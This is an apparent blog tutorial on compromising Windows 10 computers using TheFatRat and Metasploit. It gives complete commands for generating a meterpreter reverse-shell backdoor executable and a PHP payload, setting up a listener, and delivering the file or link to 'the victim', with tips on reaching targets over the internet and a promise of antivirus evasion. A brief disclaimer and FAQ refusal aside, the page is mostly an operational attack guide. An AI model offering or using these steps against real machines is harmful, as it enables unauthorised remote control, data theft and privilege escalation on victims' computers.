
How to hack windows 10 with FATRAT(Hack windows with a link)
Metasploit is the ideal tool for hacking and exploitation of android phones as well and Windows 10 devices. It also has plenty of windows modules for hacking
. But there are many other tools present such as fatrat which make hacking windows, ios, mac, Linux, and android so much easier. So in this post, you will learn about hacking windows 10 with fatrat.
Must read: How to hack facebook with setoolkit?
Table of contents
What is FATRAT?
FATRAT is a hacking framework used for making rat applications and rat apk files with reverse shells which can be used for hacking devices. We will be using FATRAT to hack windows 10 today. And yes even the latest version of windows can be hacked with fatrat. Basically it a curated toolkit of remote administration tools filled with exploits for all the platforms like Windows Linux mac and android

So why is FATRAT so great?
FATRAT is an open-source project meant to simply the hacking process required to hack windows and other platforms. It has numerous windows exploits and hacks made by the community. The best part is that it is free to use for pentesting. So let’s hack windows 10 with FATRAT
Hacking Windows 10 with FATRAT AND KALI LINUX
Disclaimer:
Please be aware that hacking is illegal unless you have permission from the account owner and the parties involved. This post should be used as a tool to help people understand how hackers are hacking windows 10 devices with Metasploit and FATRAT.
The Hacking world team shall not be held responsible if any criminal charges are brought against any person who misuses the information on this website to violate the law.
Below are the steps to hack windows 10. So let’s start hacking.
Step 1: Open Kali Linux terminal and clone FATRAT from Github
Git clone the following Windows hacking tool FATRAT from the Kali Linux terminal and run the following commands:
For cloning type
git clone https://github.com/Screetsec/TheFatRat.git
Then type cd TheFatRat
Step 3: Setup and give permissions for FATRAT Tool.
Give the folder and script root permissions to compile and execute. Use the following command shown below.
chmod +x setup.sh
Step 4: Install FATRAT and its requirements for hacking windows 10.
Now use the following command to install the FATRAT tool in Kali Linux.
Type the following command to start the installation.
./setup.sh
Note the installation will take some time. This is not a small hacking tool. Be patient and let it finish.
Once the install is finished, you will be greeted with the following screen

Type y for yes. With this, you can run fatrat from any terminal on kali
CREATING AN SIMPLE EXPLOIT TO HACK WINDOWS 10 system.
We will create fud backdoor using pwnwinds. To select this windows backdoor hack
Type 6

Now we will create fud backdoor using c# + Powershell and hack windows 10
Type 2
Now that you have chosen the backdoor.
Now you have to give the necessary parameters for hacking windows 10
Enter LHOST listener/attacker IP address.
Type 192.168.1.12
Type port 4444 or any port number.
Enter backdoor file name testfile
Type 3 for using windows/meterpreter/reverse_tcp.
Press enter to create a backdoor for hacking windows 10.
After backdoor is created, it will be saved in /home/user/Downloads/TheFatRat/output/testfile.exe.
For accessing the backdoor, go to the above location and copy the file to the victim’s pc. Or send the file to the victim. You can also run the file with the help of a USB drive.
Step 5: Metasploit setup
Open up a new kali Linux terminal and use the following command to start Metasploit framework.
# msfconsole
Now in the Metasploit console type the following commands
Firstly type, msf > use exploit/multi/handler
then setup your payload with this command, msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
after that now it’s time to setup the listening host, msf exploit(handler) > set LHOST 192.168.182.136
now you’ll have to setup the port, msf exploit(handler) > set LPORT 4444
then lastly type this command, msf exploit(handler) > exploit
Here
**LHOST= YOUR IP address
**LPORT= 4444
Step 6: Exploit the victim
Once the victim clicks on the file, a popup will come out, and then the meterpreter session will be opened.
As shown below, the meterpreter session has started in msfconsole.
The above target is using Windows 10 system with the latest updates. Yet it was easily hacked. Do note many antiviruses will see the file as a virus. I will soon make a guide on how to make the virus undetectable. So stay tuned.
Type help command to see all the possible commands you can use with the windows system
Congratulations you just hacked a windows 10 pc with a single file. But wait you are still not feeling like a hacker???
Got it, boss, Let’s do something even more hacker like. How about we do this:

How to hack a windows 10 pc with a single link (link hack)
Step 1: Startup fatrat
Here, we will create backdoor using PHP. Type 1
Create backdoor with msfvenom
Then type 5
FATRAT.PHP BACKDOOR
Step 2: Enter the required parameters, as shown:
Type LHOST 192.168.182.136
Then type port 4444
Enter file name textfile
As shown in the above image, the backdoor will be created.
After payload has created, move the payload to an apache server location. As this payload will be opened using Ip address.
Step 3: Move the file to host service
Now copy the testfile.php to /var/www/html
Then open a new terminal and type
sudo service apache2 start
Step 4: Metasploit setup
Open up a new kali Linux terminal and type the following command to start Metasploit.
Just do the same as I’ve shown here.
Here
**LHOST= YOUR IP address
**LPORT= 4444
Step 5: Exploit the victim
As the target victim opens the malicious URL.
URL IS:192.168.182.136 /testfile.php
A PHP script will start in the background, and the meterpreter session will begin, as shown below.
- After opening just a URL. The target can easily get hacked.
The moment the victim opens the link or the application on their Windows device, you will get a meterpreter shell on the Kali Linux terminal.
You have now successfully hacked the WINDOWS 10 device using FATRAT.
Use the “help” command to show all the possible options for hacking.
getsystem command can get you, admin, access, for example.
So, this is how hackers hack windows 10 using FATRAT on the local network. But what if we wanted to hack windows devices with FATRAT over the internet.
Must read: How to hack routers with routersploit
To use this hack over the internet checkout port forwarding methods with ngrok and NOIP. You can also use the manual port forwarding method
Commonly asked questions about hacking WINDOWS 10 with FATRAT
Q.1 Is this hacking tool legal?
No. It is not meant for hacking people. It is a tool meant for white hat pentesting only and should be used with the same intent. The hacking world team and authors are not responsible for any illegal use done by you.
Q.2 Fatrat is not working what do I do?
Disable firewall and antivirus and then repeat all the steps again. Make sure you do not make any typing mistakes while entering the commands.
Q.3 My antivirus detects it as a virus is it safe?
The file made by fatrat is a virus created by fatrat so obviously unless you use an application like veil, it will get detected as a virus, but that does not mean it is going to mess up your system.
Q.4 I want to hack my girlfriend’s Windows 10 laptop, how do I hack windows 10 with fatrat?
We do not support black hat hacking, and we do not reply and respond to such requests and comments. This article is meant only for educational purposes and should be used with the same intent.
Q.5 Can I use kali Linux with on my phone to use this hack?
Yes, you can use the termux app, or you can use kali Linux nethunter to hack windows 10 with fatrat via your android device.
Q.6 I do not want to use NOIP?
You can directly use your public IP address. The only issue is your public IP might change, and the shell will be lost.
Q.7 What is the difference between public and local IP address?
Public Address is the address you have on the internet. You can just google whats my IP to find out your public IP.
Your local IP is the IP address of your system on the local network. Use ifconfig for Linux and ipconfig for windows to find out your IP.
2 Comments
How to hack windows 10 simple without coding
U need paid tools for that